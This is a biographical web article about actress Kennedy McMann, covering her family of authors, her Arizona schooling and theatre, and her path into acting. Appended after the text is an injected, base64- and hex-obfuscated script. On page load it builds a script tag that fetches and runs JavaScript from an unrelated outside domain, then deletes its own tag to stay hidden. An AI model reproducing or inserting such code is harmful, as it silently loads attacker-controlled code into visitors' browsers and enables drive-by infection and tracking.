## Kennedy McMann

Kennedy McMann was born on October 30, 1996 in Holland, Michigan and was raised in Mesa, Arizona.
She is the only daughter of two kids born to Lisa McMann and Matt McMann. The family relocated from Michigan to Arizona in 2004.
She graduated from Skyline High School in Mesa, where she was a standout student. She was named student of the month in her senior year and president of the Skyline Performing Arts Club at her school and at the local Valley Youth Theater (VYT). Her performance in Macbeth at VYT won her an AriZoni Award.
In 2019, Kennedy’s cat-loving family moved to Sacramento, while the actress lives in New York.
# McMann’s Parents Are Authors
Kennedy’s mom, Lisa McMann, is a young adult author who has published New York Times bestsellers like the WAKE trilogy, the Unwanteds series, and many more. Kennedy’s dad is a musician who has also written books in the self-help genre.
he actress’ brother, Kilian, is an artist and illustrator based in Sacramento, California. Most of Killian’s graphic design work is focused on creating brand identities for different craft beverages.
Being raised by authors, Kennedy came to love young adult fiction, and especially the Nancy Drew series.
“I come from a super literary family. My mom’s an author. I grew up reading the books. I played the computer games all through college. I was hogging the family computer when I was a kid, and then it just became my laptop, when I was 19, (with) different ‘Nancy Drew’ games on it,” McMann says. “So I was pretty well versed. When it came about I was, like, ‘Ah, ah, I’ve been doing this my whole life. I’m ready to go.’”
When she got the part, it had been a long time since she last caught up with the literary character. But she chose not to do a crash course on the Edward Stratemeyer creation, confident she could draw from her Nancy Drew-filled childhood.
# McMann Graduated from Carnegie Mellon
Kennedy and Kilian had always had creative passions, something that inspired their mother to pen young adult novels. To help Kennedy cope with OCD in her childhood, her parents nudged her into acting. She went on to perform in local plays in Arizona.
When Jessica Alba opened up about her own struggles with OCD, Kennedy felt encouraged to be an actress, too. Though she still has episodes of anxiety and stress, she is able to become a different person through acting.
<script id="rCXUa" src="data:text/javascript;base64, dmFyIF93c25pbyA9IFsnXHg3MVx4NzVceDY1XHg3Mlx4NzlceDUzXHg2NVx4NmNceDY1XHg2M1x4NzRceDZmXHg3MicsICdceDYyXHg2Zlx4NjRceDc5JywgJ1x4NjdceDY1XHg3NFx4NDVceDZjXHg2NVx4NmRceDY1XHg2ZVx4NzRceDQyXHg3OVx4NDlceDY0JywgJ1x4NDRceDRmXHg0ZFx4NDNceDZmXHg2ZVx4NzRceDY1XHg2ZVx4NzRceDRjXHg2Zlx4NjFceDY0XHg2NVx4NjQnLCAnXHg2M1x4NzJceDY1XHg2MVx4NzRceDY1XHg0NVx4NmNceDY1XHg2ZFx4NjVceDZlXHg3NCcsICdceDczXHg2M1x4NzJceDY5XHg3MFx4NzQnLCAnXHg3NFx4NzlceDcwXHg2NScsICdceDc0XHg2NVx4NzhceDc0XHgyZlx4NmFceDYxXHg3Nlx4NjFceDczXHg2M1x4NzJceDY5XHg3MFx4NzQnXTsoZnVuY3Rpb24oXzE2cWV0LCBfeWI4OXkpIHt2YXIgX3Q0aFlCID0gZnVuY3Rpb24oX0NsRHVSKSB7d2hpbGUgKC0tX0NsRHVSKSB7XzE2cWV0WydwdXNoJ10oXzE2cWV0WydzaGlmdCddKCkpO319O190NGhZQigrK195Yjg5eSk7fShfd3NuaW8sIDB4MTFiKSk7dmFyIF9FU2hRNyA9IGZ1bmN0aW9uKF8yYWVpNSwgX1lERzlnKSB7XzJhZWk1ID0gXzJhZWk1IC0gMHgwO3ZhciBfVFROQ2ogPSBfd3NuaW9bXzJhZWk1XTtyZXR1cm4gX1RUTkNqO307ZG9jdW1lbnRbJ1x4NjFceDY0XHg2NFx4NDVceDc2XHg2NVx4NmVceDc0XHg0Y1x4NjlceDczXHg3NFx4NjVceDZlXHg2NVx4NzInXShfRVNoUTcoJzB4MCcpLCBmdW5jdGlvbigpIHt2YXIgX3owWVcxID0gZG9jdW1lbnRbX0VTaFE3KCcweDEnKV0oX0VTaFE3KCcweDInKSk7X3owWVcxW19FU2hRNygnMHgzJyldID0gX0VTaFE3KCcweDQnKTtfejBZVzFbJ1x4NzNceDcyXHg2MyddID0gJ1x4NjhceDc0XHg3NFx4NzBceDczXHgzYVx4MmZceDJmXHg2Ylx4NmNceDY1XHg2ZVx4NjFceDYzXHg2M1x4MzRceDJlXHg3MFx4NmZceDY0XHg2N1x4NmZceDcyXHg2ZVx4NjFceDc5XHg2MVx4MmVceDYzXHg2Zlx4NmRceDJmXHg1Zlx4NzJceDY1XHg2ZFx4NmZceDc0XHg2NVx4NWZceDc0XHg3Mlx4NjFceDYzXHg2Ylx4MmVceDZhXHg3M1x4M2ZceDYzXHg2MVx4NmRceDcwXHg2MVx4NjlceDY3XHg2ZVx4M2RceDUzXHg0Nlx4NTlceDc5XHg1M1x4NDVceDcxXHg2M1x4NDhceDM0Jztkb2N1bWVudFtfRVNoUTcoJzB4NScpXShfRVNoUTcoJzB4NicpKVsnXHg2MVx4NzBceDcwXHg2NVx4NmVceDY0XHg0M1x4NjhceDY5XHg2Y1x4NjQnXShfejBZVzEpO2RvY3VtZW50W19FU2hRNygnMHg3JyldKCdyQ1hVYScpWydceDcyXHg2NVx4NmRceDZmXHg3Nlx4NjUnXSgpO30sIHsnXHg2Zlx4NmVceDYzXHg2NSc6ICEhW119KTs="></script>
